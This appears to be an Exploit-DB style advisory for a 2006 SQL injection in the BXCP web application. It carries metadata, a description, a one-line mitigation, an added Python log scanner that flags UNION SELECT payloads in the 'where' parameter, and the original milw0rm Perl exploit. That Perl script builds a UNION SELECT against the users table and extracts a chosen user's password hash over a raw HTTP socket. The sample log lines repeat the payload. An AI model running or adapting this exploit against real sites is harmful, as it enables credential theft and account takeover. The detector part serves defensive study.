vendor: BXCP
by: x23
CVSS: 7.5 HIGH
SQL Injection (CWE-89)
Product Name: BXCP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

BXCP exploit

This exploit retrieves a user's password hash through a SQL injection vulnerability in the BXCP web application. It takes the server, directory and user ID as arguments and sends an HTTP GET request to index.php (mod=files, action=view) whose where parameter carries a UNION SELECT against the {pre}_users table. The response contains the user's password hash, which the script picks out by matching a 32-character hexadecimal string; the hash can then be used to gain access to the user's account.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being executed.
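
The validation rule applied as a log check, as an added example that is not part of the original advisory or exploit: it grades the where parameter on the index.php?mod=files&action=view route that the exploit targets. It assumes a legitimate where value is a plain non-negative integer and that logs use the Apache combined format; the function names, host and log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate `where` value on the files/view route is a plain
# non-negative integer. Route and parameter names come from the exploit on this page.
SQL_TOKENS = re.compile(r"\b(?:union|select|from|or|and)\b|--|/\*|'|;", re.I)
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')
SEVERITY = {"ok": 0, "non_numeric": 1, "sqli": 2}

def classify_where(value):
    """Grade one decoded `where` value: 'ok', 'non_numeric' or 'sqli'."""
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    return "sqli" if SQL_TOKENS.search(value) else "non_numeric"

def scan_line(line):
    """Return a verdict for an access-log line, or None if it is another route."""
    m = REQUEST_LINE.search(line)
    if not m:
        return None
    # The exploit puts an absolute URI in the request line; urlsplit handles
    # both that and the usual origin-form path.
    parts = urlsplit(m.group(1))
    if not parts.path.endswith("index.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes '+' and %xx
    if query.get("mod") != ["files"] or query.get("action") != ["view"]:
        return None
    # Grade every copy of the parameter so a duplicated `where` cannot hide one.
    verdicts = [classify_where(v) for v in query.get("where", [""])]
    return max(verdicts, key=SEVERITY.__getitem__)

def scan_log(lines):
    """Return (line_number, verdict) for every line that is not 'ok'."""
    graded = ((n, scan_line(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in graded if v not in (None, "ok")]

# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Jul/2006:10:00:01 +0200] "GET /index.php?mod=files&action=view&where=12 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [02/Jul/2006:10:00:05 +0200] "GET http://bxcp.example/index.php?mod=files&action=view&where=-1+UNION+SELECT+users_nick,0,users_pwd+FROM+{pre}_users+WHERE+users_id=1 HTTP/1.1" 200 812',
    '192.0.2.10 - - [02/Jul/2006:10:00:09 +0200] "GET /index.php?mod=news HTTP/1.1" 200 2048',
    '192.0.2.78 - - [02/Jul/2006:10:00:12 +0200] "GET /index.php?mod=files&action=view&where=12&where=0%20UNION%20SELECT%201 HTTP/1.1" 200 640',
    '192.0.2.79 - - [02/Jul/2006:10:00:15 +0200] "GET /index.php?mod=files&action=view&where=abc HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for n, verdict in scan_log(SAMPLE_LOG):
        print(n, verdict)
```

The same classify_where rule works as a request-time check: reject anything that is not graded "ok" before the value reaches a query.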

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;

print q{
-------------------------------------------------------------------------------------
BXCP exploit by x23 ~ curse-crew.de ~ geekbar.cx.la ~ geeknet.uttx.net
use: bxcp.pl [server] [dir] [id]
sample:
$ perl bxcp.pl bxcp.com / 1
~ connecting
~ exploiting
~ hash: *censored* ;D
-------------------------------------------------------------------------------------

};

$webpage =   $ARGV[0];
$directory = $ARGV[1];
$vic_id =    $ARGV[2];

if (!$vic_id) { die "~ read how to use ;)\n"; }

$get = "http://".$webpage.$directory."index.php?mod=files&action=view&where=-1+UNION+";
$get .= "SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,0,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=";
$get .= $vic_id;

print "~ connecting\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage",
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print "~ exploiting\n";
print $sock "GET $get HTTP/1.1\n";
print $sock "Host: $webpage\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
  #print $answer;
  if ($answer =~ /([0-9a-f]{32})\n/) {
     print "~ hash: $1\n";
     last;
  }
}

close($sock);

# milw0rm.com [2006-07-02]